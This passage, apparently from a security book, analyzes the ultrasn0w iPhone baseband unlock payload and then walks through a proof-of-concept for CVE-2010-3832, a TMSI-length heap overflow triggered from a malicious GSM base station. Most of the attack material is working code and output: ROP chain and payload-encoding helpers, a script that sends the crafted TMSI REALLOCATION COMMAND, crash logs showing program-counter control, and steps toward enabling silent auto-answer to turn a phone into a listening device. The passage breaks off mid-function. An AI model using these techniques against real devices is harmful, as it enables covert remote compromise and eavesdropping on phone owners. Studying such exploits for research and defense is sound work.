0x000000D0 DCD 0xFFFF1FD1 ; entry point
0x000000D4 DCD 0xFFFF04D0 ; [2nd stage] R0 (memcpy dst)
0x000000D8 DCD 0x6087A7BC ; [2nd stage] R1 (memcpy src)
0x000000DC DCD 0x1010159  ; [2nd stage] R2 (1st summand of len)
0x000000E0 DCD 0xFEFEFEFF ; [2nd stage] R3 (2nd summand of len)
Each call of the ROP gadget consumes four arguments from the stack that are placed into registers r3-r5 and PC. After 11 words have been written, the execution flow is redirected to the Thumb code created. Following is the disassembly:
0xFFFF1FD0             CODE16
0xFFFF1FD0 07 48       LDR  R0, =0x6018135C
0xFFFF1FD2 80 47       BLX  R0               ; call disable_ints
0xFFFF1FD4 07 1C       MOVS R7, R0           ; preserve CPSR
0xFFFF1FD6 0F BC       POP  {R0-R3}          ; get args for memcpy
0xFFFF1FD8 D2 18       ADDS R2, R2, R3       ; fix up length
0xFFFF1FDA 07 4B       LDR  R3, =0x601FD9FC
0xFFFF1FDC 98 47       BLX  R3               ; call memcpy
0xFFFF1FDE 38 1C       MOVS R0, R7           ; get preserved CPSR
0xFFFF1FE0 04 49       LDR  R1, =0x6018136C
0xFFFF1FE2 88 47       BLX  R1               ; call restore_cpsr
0xFFFF1FE4 01 49       LDR  R1, =0x72883C6C  ; for clean
0xFFFF1FE6 8D 46       MOV  SP, R1           ; continuation
0xFFFF1FE8 48 1A       SUBS R0, R1, R1       ; clear R0
0xFFFF1FEA F0 BD       POP  {R4-R7,PC}       ; no crash, please
0xFFFF1FEA             ; ---------------------------------------
0xFFFF1FEC 6C 3C 88 72 new_sp         DCD 0x72883C6C ; DATA XREF: 0xFFFF1FE4
0xFFFF1FF0 5C 13 18 60 P_disable_ints DCD 0x6018135C ; DATA XREF: 0xFFFF1FD0
0xFFFF1FF4 6C 13 18 60 P_restore_cpsr DCD 0x6018136C ; DATA XREF: 0xFFFF1FE0
0xFFFF1FF8 FC D9 1F 60 P_memcpy       DCD 0x601FD9FC ; DATA XREF: 0xFFFF1FDA
This code is a stager routine that copies the code from the remaining unlock string to another area at the top end of the memory. The code in question lives at 0xFFFF04D0 and disassembles as follows:
0xFFFF04D0 detour_0xFFFF04D0                     ; detour to ROM
0xFFFF04D0                 LDR   PC, =0x40736334
0xFFFF04D0 ; --------------------------------------------------
0xFFFF04D4                 CODE16
0xFFFF04D4 org_0xFFFF04D0  DCD   0x40736334      ; DATA XREF: detour_0xFFFF04D0
0xFFFF04D8 ; --------------------------------------------------
0xFFFF04D8
0xFFFF04D8 decoder_entry
0xFFFF04D8                 LDR   R0, =0x60FA011F
0xFFFF04DA                 SUBS  R0, #0x80       ; avoid 0 bytes
0xFFFF04DC                 SUBS  R0, #0x80       ; R0 = 0x60FA001F
0xFFFF04DE                 LDR   R2, =0x60701280
0xFFFF04E0                 STR   R0, [R2]
0xFFFF04E2                 ADDS  R4, R4, R7
0xFFFF04E4                 LDR   R0, =0x6018135C
0xFFFF04E6                 BLX   R0              ; call disable_ints
0xFFFF04E8                 MOVS  R7, R0
0xFFFF04EA                 ADDS  R2, R5, R6
0xFFFF04EC                 MOVS  R5, #0x22       ; '"'
0xFFFF04F0
0xFFFF04F0 decoder_loop                          ; CODE XREF: 0xFFFF0508
0xFFFF04F0                 LDRB  R0, [R4]
0xFFFF04F2                 CMP   R0, R5          ; check for end of str
0xFFFF04F4                 BEQ   break_loop
0xFFFF04F6                 NOP
0xFFFF04F8                 CMP   R0, #0xFF       ; escape character
0xFFFF04FA                 BNE   non_escaped
0xFFFF04FC                 ADDS  R4, #1          ; skip 0xFF
0xFFFF04FE                 LDRB  R0, [R4]
0xFFFF0500                 ADDS  R0, #1
0xFFFF0502
0xFFFF0502 non_escaped                           ; CODE XREF: 0xFFFF04FA
0xFFFF0502                 STRB  R0, [R2]
0xFFFF0504                 ADDS  R4, #1
0xFFFF0506                 ADDS  R2, #1
0xFFFF0508                 B     decoder_loop
0xFFFF050A ; --------------------------------------------------
0xFFFF050A
0xFFFF050A break_loop                            ; CODE XREF: 0xFFFF04F4
0xFFFF050A                 MOVS  R0, R7
0xFFFF050C                 LDR   R1, =0x6018136C
0xFFFF050E                 BLX   R1              ; call restore_cpsr
0xFFFF0510                 SUBS  R0, R1, R1
0xFFFF0512                 MOV   R2, SP
0xFFFF0514                 LDR   R2, [R2]
0xFFFF0516                 BX    R2
0xFFFF0516 ; --------------------------------------------------
0xFFFF0518 dword_FFFF0518  DCD   0x60FA011F      ; DATA XREF: decoder_entry
0xFFFF051C dword_FFFF051C  DCD   0x60701280      ; DATA XREF: 0xFFFF04DE
0xFFFF0520 P_disable_ints  DCD   0x6018135C      ; DATA XREF: 0xFFFF04E4
0xFFFF0524 P_restore_cpsr  DCD   0x6018136C      ; DATA XREF: 0xFFFF050C
Because a ThreadX routine lived at the address overwritten by the previous code, the first instruction is a simple detour to a version of the overwritten function in flash. The code starting at 0xFFFF04D8 is a simple decoder that subsequent at+xapp overflow instantiations use to deliver arbitrary payloads. The decoder is required for injecting binary blobs, because certain bytes, such as whitespace and the zero byte, cannot appear in the string passed to at+xapp. It uses r5+r6 as the destination address for the decoded payload and r4+r7 as the source address of its input. It copies bytes until it hits a quotation mark (0x22) and treats 0xff as an escape symbol. When 0xff is found in the input, the escape symbol is discarded, and the byte following it is incremented by one (modulo 256) and copied to the output.
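Both byte-avoidance tricks can be reproduced on the host side. The first is the escape scheme just described. The decoder below mirrors the Thumb loop, and the encoder is our inverse of it. The second is the split-summand trick from the stager: 0x01010159 + 0xFEFEFEFF wraps around to a copy length of 0x58, and the SUBS pair above turns 0x60FA011F into 0x60FA001F, so no zero bytes appear in either case. The forbidden-byte set (NUL, LF, CR, space, and quote) is an assumption, and the function names are hypothetical.

```python
# Assumption: bytes that cannot appear raw inside the AT+XAPP string.
FORBIDDEN = {0x00, 0x0A, 0x0D, 0x20, 0x22}
ESCAPE = 0xFF
TERMINATOR = 0x22  # '"' ends the decoder's input


def encode(payload: bytes) -> bytes:
    """Escape each forbidden byte (and 0xFF itself) as 0xFF, byte - 1."""
    out = bytearray()
    for b in payload:
        if b in FORBIDDEN or b == ESCAPE:
            escaped = (b - 1) & 0xFF
            if escaped in FORBIDDEN:  # the escaped byte travels raw, too
                raise ValueError(f"cannot encode byte 0x{b:02x}")
            out += bytes([ESCAPE, escaped])
        else:
            out.append(b)
    return bytes(out)


def decode(data: bytes) -> bytes:
    """Python rendering of the decoder loop at 0xFFFF04F0."""
    out = bytearray()
    i = 0
    while data[i] != TERMINATOR:
        b = data[i]
        if b == ESCAPE:  # skip the escape and increment the following byte
            i += 1
            b = (data[i] + 1) & 0xFF
        out.append(b)
        i += 1
    return bytes(out)


def split_without_zero_bytes(value: int):
    """Return (a, b) without zero bytes such that (a + b) mod 2**32 == value."""
    for m in range(1, 256):
        k = m * 0x01010101
        a, b = (value + k) & 0xFFFFFFFF, (-k) & 0xFFFFFFFF
        if all((w >> s) & 0xFF for w in (a, b) for s in (0, 8, 16, 24)):
            return a, b
    raise ValueError("no zero-free split found")
```

For the stager's 0x58-byte copy, the first candidate (m = 1) already produces exactly the pair 0x01010159 and 0xFEFEFEFF used in the unlock string.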
This approach raises two questions: Why is a ROP chain needed to inject the decoder and what is so special about the memory space the stager and the decoder were copied to?
The X-Gold 61x introduced a new security feature, namely a strict form of Data Execution Prevention (DEP). All memory regions that are writable lack the execute flag. Furthermore, memory is marked as executable in the early initialization phase, and after this phase the page permissions are locked. There seems to be no way to ever set an execute flag on a writable page after this initialization phase is completed.
On the other hand, the preceding payload contains native code, not just ROP chains. How does that work? It turns out that the DEP armor has a significant chink. ARM CPUs can have tightly coupled memory (TCM), fast on-chip memory that sits alongside the first-level caches. The ARM1176 core in the X-Gold 61x has a TCM that is enabled during initialization:
0x40100054 MOV R0, #0                ; TCM bank 0
0x40100058 MCR p15, 0, R0,c9,c2, 0   ; write TCM selection register
0x4010005C NOP
0x40100060 MOV R0, #1                ; "1 = I/D TCM Region Register accessible in
                                     ;  Secure and Non-secure worlds."
0x40100064 MCR p15, 0, R0,c9,c1, 2   ; write DTCM non-secure control access
                                     ; register
0x40100068 NOP
0x4010006C MCR p15, 0, R0,c9,c1, 3   ; write ITCM non-secure control access
                                     ; register
0x40100070 NOP
0x40100074 LDR R1, =0xFFFF000D       ; enable ITCM with base address 0xFFFF0000
0x40100078 MCR p15, 0, R1,c9,c1, 1   ; write ITCM region register
0x4010007C NOP
0x40100080 LDR R1, =0xFFFF200D       ; enable DTCM with base address 0xFFFF2000
0x40100084 MCR p15, 0, R1,c9,c1, 0   ; write DTCM region register
0x40100088 NOP
0x40100088 ; ==========================
0x4010008C MOV R0, #1                ; TCM bank 1
0x40100090 MCR p15, 0, R0,c9,c2, 0   ; write TCM selection register
0x40100094 NOP
0x40100098 MOV R0, #1                ; "1 = I/D TCM Region Register accessible in
                                     ;  Secure and Non-secure worlds."
0x4010009C MCR p15, 0, R0,c9,c1, 2   ; write DTCM non-secure control access register
0x401000A0 NOP
0x401000A4 MCR p15, 0, R0,c9,c1, 3   ; write ITCM non-secure control access register
0x401000A8 NOP
0x401000AC LDR R1, =0xFFFF100D
0x401000B0 MCR p15, 0, R1,c9,c1, 1   ; write ITCM region register
0x401000B4 NOP
0x401000B8 LDR R1, =0xFFFF300D
0x401000BC MCR p15, 0, R1,c9,c1, 0   ; write DTCM region register
0x401000C0 NOP
0x401000C4 BX LR
This explains why the exploit could write to addresses above 0xFFFF0000 and have the CPU execute the written data as code.
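Putting the two observations together, the first unlock string is a generator-friendly structure: a chain of stores aimed at the ITCM. The sketch below rebuilds that chain from (address, value) pairs and refuses targets outside an enabled ITCM bank. The gadget addresses and region register values come from the listings above. It reads the region registers as bits [31:12] for the base and bit 0 for the enable flag, as described for ARM1176 TCM region registers. It also assumes 4 KB banks, which matches the 4 KB spacing of the four regions. The stager's trailing memcpy arguments are not modelled, and the helper names are hypothetical.

```python
import struct

POP_R3_R5_PC = 0x6014A0F3   # POP {R3-R5}, PC
STR_R4_R5_POP = 0x6014A0F1  # STR R4, [R5]; POP {R3-R5}, PC
FILLER = 0x55555555         # 'UUUU', discarded into R3

ITCM_REGIONS = (0xFFFF000D, 0xFFFF100D)  # ITCM region register values, banks 0 and 1
BANK_SIZE = 0x1000                       # assumption: 4 KB per bank


def in_itcm(addr):
    """True if addr lies inside an enabled ITCM bank."""
    for reg in ITCM_REGIONS:
        base = reg & 0xFFFFF000
        if reg & 1 and base <= addr < base + BANK_SIZE:
            return True
    return False


def write_chain(writes, entry_point):
    """Chain words that store each (address, value) pair, then jump to entry_point."""
    # Saved R4-R7 overwritten by the overflow (unused), then the initial POP.
    words = [0x34343434, 0x35353535, 0x36363636, 0x37373737, POP_R3_R5_PC]
    for addr, value in writes:
        if not in_itcm(addr):
            raise ValueError(f"0x{addr:08x} is not executable ITCM")
        words += [FILLER, value, addr, STR_R4_R5_POP]
    # The last gadget's POP {R3-R5}, PC consumes three words, then the entry point.
    words += [0x33333333, 0x34343434, 0x35353535, entry_point]
    return words


def pack(words):
    return struct.pack(f"<{len(words)}I", *words)
```

Feeding it the 11 words of the stager, stored from 0xFFFF1FD0 upward, reproduces the offsets of the listing, with the entry point 0xFFFF1FD1 at offset 0xD0.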
To make sense of the second and third at+xapp strings being sent, you first have to understand the last one. We will not give the payload contained in the last unlock string in its entirety, but rather only have a quick look at the meat of it:
0xFFFF0A30                 LDR   R4, =0x601FD9FC ; memcpy
0xFFFF0A32                 LDR   R5, =0x60FA0000 ; void *ptr = 0x60FA0000
0xFFFF0A34                 LDR   R6, =0xFFFF1000
0xFFFF0A36
0xFFFF0A36 tcm_patch_loop                        ; CODE XREF: sub_FFFF09A8+A2
0xFFFF0A36                 LDRH  R0, [R5]        ; dst_offset = *((uint16_t *) ptr)
0xFFFF0A38                 LDRH  R2, [R5,#2]     ; len = *((uint16_t *) ptr + 1)
0xFFFF0A3A                 MOVS  R7, R2
0xFFFF0A3C                 CMP   R2, #0          ; if (len == 0)
0xFFFF0A3E                 BEQ   tcm_pl_exit     ; { goto tcm_pl_exit; }
0xFFFF0A40                 ADDS  R5, #4          ; ptr += 4
0xFFFF0A42                 MOVS  R1, R5
0xFFFF0A44                 ADDS  R0, R0, R6      ; dst = 0xFFFF1000 + dst_offset
0xFFFF0A46                 BLX   R4              ; memcpy(0xFFFF1000 + dst_offset,
                                                 ;        ptr, len)
0xFFFF0A48                 ADDS  R5, R5, R7      ; ptr += len
0xFFFF0A4A                 B     tcm_patch_loop
0xFFFF0A4C ; --------------------------------------------------------
0xFFFF0A4C
0xFFFF0A4C tcm_pl_exit                           ; CODE XREF: sub_FFFF09A8+96
0xFFFF0A4C                 LDR   R0, =0xFFFF0F78
0xFFFF0A4E                 ADR   R1, sub_FFFF0B54
0xFFFF0A50                 MOVS  R2, #0xC
0xFFFF0A52                 BLX   R4
0xFFFF0A54                 BL    sub_FFFF0A74
0xFFFF0A58                 POP   {R4-R7}
0xFFFF0A5A                 MOVS  R0, #0
0xFFFF0A5C                 LDR   R3, =0x60186E5D ; stack_cleanup (SP+=0x1C)
0xFFFF0A5E                 BX    R3
The second and third at+xapp strings store, at address 0x60FA0000, a list of patches to apply to the TCM. The previous code traverses this list, which has a simple format. Each entry has a header consisting of a 16-bit offset field relative to 0xFFFF1000 and a 16-bit length field giving the length of the entry's data, excluding the header. The list is terminated by an entry with zero in the length field. The following IDAPython script emulates the behavior of the previous native code.
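from idc import *

ea = 0x60FA0000   # start of the patch list
dst = 0xFFFF1000  # patch offsets are relative to this address
while True:
    n = Word(ea+2)     # 16-bit length of this patch
    offset = Word(ea)  # 16-bit offset relative to dst
    if n == 0:         # terminating entry
        break
    print("patching %d bytes at 0x%08x." % (n, dst + offset))
    ea += 4            # skip the header
    for i in range(n):
        PatchByte(dst+offset+i, Byte(ea+i))
        SetColor(dst+offset+i, CIC_ITEM, 0xFFFF00)  # highlight patched bytes
    ea += n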
Use the Load Additional Binary File function to load the decoded, concatenated payload of unlock strings two and three to address 0x60FA0000 into an existing IDA Pro database of the stack, then run the preceding script.
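If you want to inspect the patches without IDA Pro, the same list can be applied to a plain byte buffer. The sketch below follows the loop at 0xFFFF0A36 field for field: a little-endian 16-bit offset, then a 16-bit length, then the data. Unlike the native code, it also checks for truncated records and out-of-range destinations. The bytearray standing in for TCM memory starting at tcm_base, and the function name, are hypothetical.

```python
import struct

PATCH_BASE = 0xFFFF1000  # patch offsets are relative to this address


def apply_tcm_patches(patch_list, tcm, tcm_base=0xFFFF0000):
    """Apply (offset, length, data) records to `tcm`; return (address, length) pairs."""
    applied = []
    pos = 0
    while True:
        offset, length = struct.unpack_from("<HH", patch_list, pos)
        if length == 0:  # terminating entry
            break
        pos += 4
        data = patch_list[pos:pos + length]
        if len(data) != length:
            raise ValueError("truncated patch record")
        start = PATCH_BASE + offset - tcm_base
        if start < 0 or start + length > len(tcm):
            raise ValueError("patch lies outside the TCM image")
        tcm[start:start + length] = data
        applied.append((PATCH_BASE + offset, length))
        pos += length
    return applied
```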
Another interesting facet of the payload in the last unlock string is the following pair of functions, shown here as C representations:
/* 0xFFFF0AB2 */
void replace_addrs_on_stack(uint32_t *start, uint32_t *end,
                            uint32_t match20msb, uint32_t replace_base)
{
    while (start < end) {
        /* this remaps every address pointing to the TCM region on the
           stack to its flash equivalent. forreal. whoaaa */
        if (*start >> 12 == match20msb >> 12)
            *start = (*start & 0xFFF) + replace_base;
        ++start;
    }
}

/* 0xFFFF07AE */
void replace_addrs_on_all_stacks(uint32_t match20msb, uint32_t replace_base)
{
    TX_THREAD *thread_ptr = tx_thread_created_ptr; /* [R4] */
    ULONG i;
    /* i is stored in [SP]
     * tx_thread_created_count is in R7
     * thread_ptr is in R4 */
    for (i = 0; i < tx_thread_created_count; i++) {
        replace_addrs_on_stack((uint32_t *) thread_ptr->tx_thread_stack_start,
                               (uint32_t *) thread_ptr->tx_thread_stack_end,
                               match20msb, replace_base);
        thread_ptr = thread_ptr->tx_thread_created_next;
    }
}
The replace_addrs_on_all_stacks function rewrites the return addresses on the stacks of all threads. Every return address pointing into the TCM is replaced with the corresponding address in flash memory, that is, the location from which the scatter loader originally copied that code into the TCM.
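The following Python model of replace_addrs_on_stack makes the matching rule explicit. Comparing the values shifted right by 12 selects exactly one 4 KB page, and the low 12 bits are kept as the offset from replace_base. Like the C original, it rewrites any word that happens to fall into that page, not only genuine return addresses. The list of words standing in for a thread's stack and the flash base used in the example are hypothetical.

```python
def replace_addrs_on_stack(stack, match, replace_base):
    """Rewrite words in the 4 KB page of `match` to replace_base + page offset.

    `stack` is a list of 32-bit words (a stand-in for one thread's stack).
    Returns the number of words rewritten.
    """
    count = 0
    for i, word in enumerate(stack):
        if word >> 12 == match >> 12:
            stack[i] = ((word & 0xFFF) + replace_base) & 0xFFFFFFFF
            count += 1
    return count
```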
The lessons you learned from ultrasn0w will be of great advantage if you choose to develop a remote exploit for the iPhone4.
This section analyzes the CVE-2010-3832 vulnerability and gives a proof-of-concept exploit for it. The vulnerability is a memory corruption of a buffer caused by a missing bounds check on the length of the TMSI in LOCATION UPDATING REQUESTs and TMSI REALLOCATION COMMANDs, which belong to Mobility Management. It affects the baseband of all iOS devices running iOS versions prior to 4.2. No user interaction is required. The device simply has to come within range of a malicious base station that wishes to exploit this vulnerability.
Here we show you how to trigger this vulnerability and how to leverage the heap corruption to gain control over the program counter. We then show you how to turn on the auto-answer functionality of the iPhone by executing the handler for setting the S0 register. This allows an attacker to turn an iPhone into a remote listening device.
We investigate this bug on an iPhone 2G running iOS 3.1.3 with baseband firmware ICE 04.05.04_G. The description here is the story recovered from scattered notes on how the bug was originally found and exploited, minus some boring dead ends. We have chosen the iPhone 2G over the more recent iPhone 4 for two reasons. First, the codebase of the iPhone 2G is much smaller, so a clean IDB can be obtained much more quickly than for the iPhone 4. Second, on the iPhone 4 this bug has been patched, and no known way exists to downgrade the baseband firmware to a vulnerable version. Contrast this with the iPhone 2G, where the firmware is completely malleable due to implementation failures in the security checks performed by the bootloader. This means that you can buy any old second-hand iPhone 2G and get your hands dirty in baseband hacking with a publicly known vulnerability. There is no fear of buying a device with the wrong baseband firmware revision, and no time or money lost to accidental upgrades.
A TMSI REALLOCATION COMMAND with the length of the TMSI extended to 64 bytes neatly triggers the bug. Figure 11.3 shows a GSM layer 3 message containing a TMSI REALLOCATION COMMAND that triggers the bug, displayed via the Wireshark network analyzer.
Unfortunately, the message cannot be created directly with an unmodified version of libmich. Like other standards-compliant implementations of the GSM and 3GPP protocols, libmich has no reason to support TMSIs whose length differs from four bytes. However, you can easily use libmich to create an appropriate message and then modify the TMSI field and its length.
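To see how the bytes of such a message are laid out, the following standalone sketch builds the TMSI REALLOCATION COMMAND without libmich. The function names build_tmsi_realloc, encode_plmn and marker_tmsi are ours. The MCC/MNC encoding follows the BCD layout of 3GPP TS 24.008, the type octet defaults to the 0xfc value used in the script that follows, and, unlike a standards-compliant encoder, the builder accepts a TMSI of any length.

```python
def encode_plmn(mcc: str, mnc: str) -> bytes:
    """BCD-encode MCC/MNC into the three PLMN octets of a LAI."""
    d = [int(c) for c in mcc]
    m = [int(c) for c in mnc]
    mnc3 = m[2] if len(m) == 3 else 0xF   # filler nibble for 2-digit MNCs
    return bytes([
        (d[1] << 4) | d[0],
        (mnc3 << 4) | d[2],
        (m[1] << 4) | m[0],
    ])


def build_tmsi_realloc(mcc: str, mnc: str, lac: int, tmsi: bytes,
                       type_octet: int = 0xFC) -> bytes:
    """MM TMSI REALLOCATION COMMAND carrying a TMSI of arbitrary length."""
    msg = bytes([0x05, 0x1A])                  # PD = Mobility Management, TMSI REALLOCATION COMMAND
    msg += encode_plmn(mcc, mnc)               # MCC/MNC part of the LAI
    msg += lac.to_bytes(2, "big")              # location area code
    msg += bytes([len(tmsi) + 1, type_octet])  # IE length counts type octet + TMSI
    return msg + tmsi


def marker_tmsi(n_words: int) -> bytes:
    """TMSI of n_words words: byte 4*i followed by three 0x66 filler bytes."""
    return b"".join(bytes([4 * i, 0x66, 0x66, 0x66]) for i in range(n_words))
```

With MCC 001, MNC 01 and LAC 42, build_tmsi_realloc("001", "01", 42, marker_tmsi(19)).hex() gives the same hex string the script constructs, 85 bytes in total.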
First start up OpenBTS, register the iPhone with your network, and initiate a UDP channel for exchanging GSM layer 3 packets with the handset by using the testcall facility of OpenBTS:
OpenBTS> tmsis
TMSI IMSI IMEI(SV) age used
0x4f5e0ccc 262XXXXXXXXXXXX 01XXXXXXXXXXXXXX 293s 293s
1 TMSIs in table
OpenBTS> testcall 262XXXXXXXXXXXX 60
OpenBTS> calls
1804289383 TI=(1,0) IMSI=262XXXXXXXXXXXX Test from=0 Q.931State=active SIPState= Null (2 sec)
1 transactions in table
You then send this payload using the following small Python script:
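#!/usr/bin/python
# Python 2 script
import socket
import binascii
from libmich.formats import *

TESTCALL_PORT = 28670   # UDP port of the OpenBTS testcall facility
n_words = 19            # number of 32-bit words in the oversized TMSI
lai = 42                # location area code

# PD 0x05 (Mobility Management), type 0x1a (TMSI REALLOCATION COMMAND),
# MCC/MNC 001/01
hexstr = "051a00f110"
# LAC, identity length (type octet + TMSI bytes), type octet 0xfc (TMSI)
hexstr += "%02x%02x%02xfc" % (lai >> 8, lai & 255, 4 * n_words + 1)
# Oversized TMSI: the low byte of word i is 4*i, the rest is 0x66 filler
hexstr += ''.join('%02x666666' % (4 * i) for i in range(n_words))
print "layer3 message to be sent:", hexstr
l3msg = binascii.unhexlify(hexstr)
print "libmich interprets this as: ", repr(L3Mobile.parse_L3(l3msg))

tcsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
tcsock.settimeout(1)
try:
    tcsock.sendto(l3msg, ('127.0.0.1', TESTCALL_PORT))
    reply = tcsock.recv(1024)
    print "reply received: ", repr(L3Mobile.parse_L3(reply))
except socket.timeout:
    print "no reply received. potential crash?"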
Shortly after executing that script, you lose your signal (the baseband processor resets). The result is a crash log similar to the following on the iPhone, which you can extract using AT+XLOG:
+XLOG: Exception Number: 1
Trap Class: 0xAAAA (HW DATAABORT TRAP)
System Stack:
0x6666661C 0x66666630 0x66666644 0xA027CBFC
0xA027CCE4 0x6666665C 0x0000000A 0x6666665C
[...]
Date: 14.07.2010
Time: 04:58
Register:
r0: 0xA027CBFC r1: 0xA027CCE4 r2: 0x6666665C r3: 0x0000000A
r4: 0x6666665C r5: 0xA027CCE4 r6: 0x00000001 r7: 0xB0016AA4
r8: 0x00000000 r9: 0xA00028E4 r10: 0xB008E730 r11: 0xB008FE9C
r12: 0x45564E54 r13: 0xB008FA8C r14: 0xA0072443 r15: 0xA0026818
SPSR: 0xA0000033 DFAR: 0x6666666C DFSR: 0x00000005
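Because every payload word carries the 0x66 filler in its upper three bytes (the words are stored little-endian, so bytes 1c 66 66 66 show up as 0x6666661C), attacker-controlled values stand out in a crash log. A small sketch for listing them follows; the helper names are ours, and the regular expression assumes the `name: 0xVALUE` layout of the register dump shown above.

```python
import re

# Matches "r0: 0xA027CBFC", "DFAR: 0x6666666C", etc. in an +XLOG dump.
REG_RE = re.compile(r"\b(r\d{1,2}|SPSR|DFAR|DFSR):\s*(0x[0-9A-Fa-f]{8})")


def parse_registers(log: str) -> dict:
    """Map register names in an +XLOG register dump to integer values."""
    return {name: int(value, 16) for name, value in REG_RE.findall(log)}


def controlled(regs: dict, filler: int = 0x666666) -> list:
    """Names of registers whose upper 24 bits equal the payload filler."""
    return [name for name, value in regs.items() if value >> 8 == filler]
```

For the register dump above, controlled() returns r2, r4 and DFAR, which points straight at the payload as the source of the faulting address.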
Take a peek at the code producing the preceding exception:
ROM:A002680A FF B5       PUSH {R0-R7,LR}
ROM:A002680C 0D 00       MOVS R5, R1
ROM:A002680E 83 B0       SUB  SP, SP, #0xC
ROM:A0026810 10 69       LDR  R0, [R2,#0x10]          ; causes HW DATAABORT TRAP
ROM:A0026812 14 00       MOVS R4, R2
ROM:A0026814 0D 9A       LDR  R2, [SP,#0x30+arg_4]
ROM:A0026816 0C 99       LDR  R1, [SP,#0x30+arg_0]
ROM:A0026818 FF F7 6D FB BL   sub_A0025EF6
ROM:A002681C A0 69       LDR  R0, [R4,#0x18]
ROM:A002681E 26 00       MOVS R6, R4
This code is at the beginning of a function we call recv_signal() (not the official name, but our choice), which is called from more than 40 tasks and is used for inter-task communication: it receives signals from other tasks. In this case, the link register (r14) points into the main function of the mme:1 task, so recv_signal() was called directly from there. Moreover, by looking at the pool allocations in the Application_Initialize() routine, you can deduce that the partition in question was allocated from a pool handing out 52-byte chunks.
Although the crash log shows the program counter (r15) as 0xA0026818, you can deduce from the Data Fault Address Register (DFAR) and the dump of the other registers that the faulting instruction was the register load from memory at 0xA0026810: r2 holds 0x6666665C, and r2 + 0x10 is exactly the DFAR value 0x6666666C. Great! This means you can control the first argument that is passed to the function sub_A0025EF6(ptr). Disassembling this function shows that it is a mere wrapper around NU_Deallocate_Partition(ptr) that first checks whether ptr == NULL. For a NULL pointer it logs an error; otherwise, it simply calls NU_Deallocate_Partition(ptr). Looking more closely at the implementation of partition memory, you can see that this route will not be an easy one. Unlike the dynamic memory implementation, partition memory does not give you an easy write4 primitive, because fixed-size partitions never need to be coalesced. Other ways exist to exploit control over some of the registers in this scenario, but they are all long-winded and painful.
A simpler way to reach your goal is to go for control over the program counter, and it turns out there is an easy way to get it. By increasing the TMSI length by four bytes on each try, and hence the number of overwritten words by one, you quickly arrive at the case of 19 overwritten words:
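The contrast between the two allocators is easiest to see in a toy model. The following is a deliberately simplified sketch of a fixed-size partition pool; the class and method names are ours, and it does not reproduce the real Nucleus PLUS control structures. Deallocation only pushes the block back onto a free list and never merges or rewrites neighboring blocks, so there is no coalescing step whose pointer updates could be bent into a write4.

```python
class PartitionPool:
    """Toy fixed-size partition pool backed by a single bytearray."""

    def __init__(self, block_size: int, count: int):
        self.block_size = block_size
        self.memory = bytearray(block_size * count)
        # Stack of free block indices; block 0 is handed out first.
        self.free = list(range(count - 1, -1, -1))

    def allocate(self) -> int:
        """Return the byte offset of a free block."""
        if not self.free:
            raise MemoryError("pool exhausted")
        return self.free.pop() * self.block_size

    def deallocate(self, offset: int) -> None:
        """Return a block: only the free list changes, no neighbor is merged."""
        if offset % self.block_size:
            raise ValueError("offset is not a block boundary")
        self.free.append(offset // self.block_size)
```

Using a block size of 52 bytes, as in the pool identified above, freeing one block leaves the contents of the adjacent block untouched, and the next allocation simply hands the freed block out again.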
+XLOG: Exception Number: 1
Trap Class: 0xBBBB (HW PREFETCH ABORT TRAP)
System Stack:
0xA006FCA4 0x00000677 0x00000000 0x0000000A
0x00000000 0x00000000 0xB000E720 0xB000E788
Date: 17.07.2010
Time: 21:31
Register:
r0: 0x00000000 r1: 0x60000013 r2: 0xFFFF231C r3: 0x00000000
r4: 0x6666665C r5: 0x66666660 r6: 0x66666664 r7: 0xB0016978
r8: 0x00000000 r9: 0xA00028E4 r10: 0xB008E730 r11: 0xB008FE9C
r12: 0x45564E54 r13: 0xB008FABC r14: 0xFFFF1360 r15: 0x6666666C
SPSR: 0x60000013 DFAR: 0x00000024 DFSR: 0x00000005
Lo and behold, you have gained control over the program counter! Looking around the area referenced by the link register, you see that the function you were supposed to be returning from had no arguments and was called using a BL instruction. To test whether things are working, you try to return to a location that simply does a BX LR. Woohoo, this works as well! No crash log is produced and no signal is lost when you send a message with 0xFFFF058C as the 19th word of the TMSI.
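Building such a test message only requires replacing the 19th TMSI word (index 18). Since the crash logs show the payload words coming back little-endian, the replacement value has to be packed with the `<I` format. A minimal sketch, with helper names of our own choosing:

```python
import struct


def marker_words(n_words: int) -> bytearray:
    """Marker TMSI as in the script: byte 4*i followed by three 0x66 bytes."""
    return bytearray(b"".join(bytes([4 * i, 0x66, 0x66, 0x66])
                              for i in range(n_words)))


def set_word(tmsi: bytearray, index: int, value: int) -> None:
    """Overwrite word `index` (0-based) with a little-endian 32-bit value."""
    struct.pack_into("<I", tmsi, 4 * index, value)
```

Calling set_word(tmsi, 18, 0xFFFF058C) on a 19-word marker TMSI makes the last four bytes 8c 05 ff ff; the header and length octet stay exactly as in the script.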
Finally, you need to work out how to turn on auto-answer. 3GPP TS 27.007, together with ITU-T Recommendation V.250, makes it mandatory to implement automatic answering of calls after a specified number of rings. The number of rings is stored in an S register, namely S0; it can be set with the AT command ATS0=n, where n is the number of rings, and queried with ATS0?. The contents of the S registers can be stored in NVRAM as a so-called ATC profile using AT&W. After identifying a function that manipulates this ATC profile by means of its error strings, you can hunt down the functions reading from and writing to NVRAM and figure out the in-memory format of the ATC profile. You then see that the following function, get_at_sreg_value, is called with k set to zero to query register Sn.
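/* Decompiler output, cleaned up; addresses are Thumb entry points. */
#include <stdint.h>

extern uint32_t dword_B01B204C[];   /* table with 15-word entries */
extern uint32_t dword_B01B23D0[];   /* table with 17-word entries */

/* 0xA01B9F1B */
uint32_t __fastcall get_at_sreg_base_ptr(uint32_t a1, uint32_t a2)
{
    uint32_t *t1 = &dword_B01B204C[15 * a1];
    uint32_t *t2 = &dword_B01B23D0[17 * a2];
    uint32_t result;

    if (t1[12])
        result = t2[14] + t1[13];
    else
        result = 0;
    return result;
}

/* 0xA01C5AB7 */
uint32_t __fastcall get_at_sreg_value(uint32_t k, uint32_t n)
{
    /* The base is a byte address; each S register is a single byte. */
    return *((uint8_t *)(uintptr_t)get_at_sreg_base_ptr(9, k) + n + 8);
}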
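Because both tables consist of 32-bit words with 15- and 17-word entries, the addresses that get_at_sreg_base_ptr reads can be worked out by hand. The following Python sketch (our own helper names) mirrors the decompiled logic over a dictionary standing in for baseband memory. The real table contents are not known here, so any memory values you feed it are placeholders.

```python
TABLE1 = 0xB01B204C   # dword_B01B204C, 15 words per entry
TABLE2 = 0xB01B23D0   # dword_B01B23D0, 17 words per entry


def sreg_reads(a1: int, a2: int) -> tuple:
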